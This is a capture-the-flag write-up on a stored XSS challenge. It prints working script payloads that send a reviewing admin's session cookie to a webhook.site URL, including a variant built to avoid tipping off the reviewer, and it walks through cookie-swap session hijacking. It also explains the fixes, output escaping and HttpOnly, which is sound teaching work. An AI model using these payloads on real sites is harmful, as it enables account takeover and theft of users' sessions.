Rating:

# XSS Cookie-Jacking

Starts with a simple login and forum. Account creation is required; once registered you can visit `/post/1` and leave a comment. Every comment is reviewed by the Admin user, and comment bodies are rendered with **no** sanitization, so this is a stored XSS.

Post a comment with an embedded `<script>` that sends the Admin's cookies to a [webhook](https://webhook.site/) as soon as the Admin opens your comment.

```
<script>
  // Beacon document.cookie to your webhook.site URL (replace <your-id>).
  // encodeURIComponent keeps '=' and ';' in the cookie string from breaking the query.
  document.write('<img src="https://webhook.site/<your-id>?c=' + encodeURIComponent(document.cookie) + '">');
</script>
```

When the Admin views the comment, webhook.site shows an incoming request with the Admin's session cookie (`x-wing`) in the query string. Replace the `x-wing` cookie in your own requests (browser devtools or an intercepting proxy) with the Admin's value and reload the challenge page: you are now logged in as Admin. Note that this only works because the session cookie was set without the `HttpOnly` flag; with `HttpOnly`, `document.cookie` would not expose it to injected script, and the XSS would need a different payload (for example, making requests as the Admin from inside the page).
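The two halves of this challenge side by side, as an added example that is not part of the original writeup or of the challenge code: the attacker's payload construction (cookie parsing, beacon URL encoding) and a hypothetical server side that shows why the attack worked (verbatim HTML interpolation, session cookie without `HttpOnly`) next to the fixed versions. The cookie name `x-wing` comes from the writeup; the webhook URL is a placeholder, and `renderComment*`/`sessionSetCookie` are illustrative names, not the challenge's real handlers.

```javascript
// Added example, not from the original writeup. The webhook URL is a placeholder.
const WEBHOOK = "https://webhook.site/REPLACE-WITH-YOUR-ID";

// Parse a document.cookie-style string ("a=1; b=2") into an object.
function parseCookies(cookieStr) {
  const out = {};
  for (const part of cookieStr.split(";")) {
    const idx = part.indexOf("=");
    if (idx < 0) continue;
    const name = part.slice(0, idx).trim();
    if (name) out[name] = part.slice(idx + 1).trim();
  }
  return out;
}

// The beacon URL the injected script requests. Encoding matters: cookie strings
// contain '=' and ';', which would otherwise corrupt the query string.
function buildBeaconUrl(webhook, cookieStr) {
  return webhook + "?c=" + encodeURIComponent(cookieStr);
}

// The payload to paste into the comment form. new Image() avoids document.write,
// which can blank the page and tip off the reviewer.
function buildPayload(webhook) {
  return (
    "<script>new Image().src=" +
    JSON.stringify(webhook) +
    '+"?c="+encodeURIComponent(document.cookie);</script>'
  );
}

// --- Hypothetical server side: why it worked, and the fix ---

// Vulnerable: the comment body is interpolated into HTML verbatim (stored XSS).
function renderCommentUnsafe(body) {
  return `<div class="comment">${body}</div>`;
}

// Fixed: HTML-escape before interpolation so <script> becomes inert text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (ch) => map[ch]);
}
function renderCommentSafe(body) {
  return `<div class="comment">${escapeHtml(body)}</div>`;
}

// Session cookie header. Without HttpOnly, document.cookie exposes it to any injected script.
function sessionSetCookie(value, { httpOnly = true } = {}) {
  const attrs = [`x-wing=${value}`, "Path=/", "Secure", "SameSite=Lax"];
  if (httpOnly) attrs.push("HttpOnly");
  return attrs.join("; ");
}

// Simulate what document.cookie would return for a set of Set-Cookie headers:
// browsers omit HttpOnly cookies from it.
function visibleToScript(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(";")[0].trim())
    .join("; ");
}

// Stand-alone demo with a constructed cookie string.
const stolen = "x-wing=abc123; theme=dark";
console.log("payload:", buildPayload(WEBHOOK));
console.log("beacon :", buildBeaconUrl(WEBHOOK, stolen));
console.log("session:", parseCookies(stolen)["x-wing"]);
console.log("unsafe :", renderCommentUnsafe("<script>alert(1)</script>"));
console.log("safe   :", renderCommentSafe("<script>alert(1)</script>"));
console.log("leaks  :", visibleToScript([sessionSetCookie("abc123", { httpOnly: false })]));
console.log("fixed  :", visibleToScript([sessionSetCookie("abc123")]));
```

Escaping output is the fix for the injection itself; `HttpOnly` is defence in depth that stops this particular exfiltration even if another injection point is found.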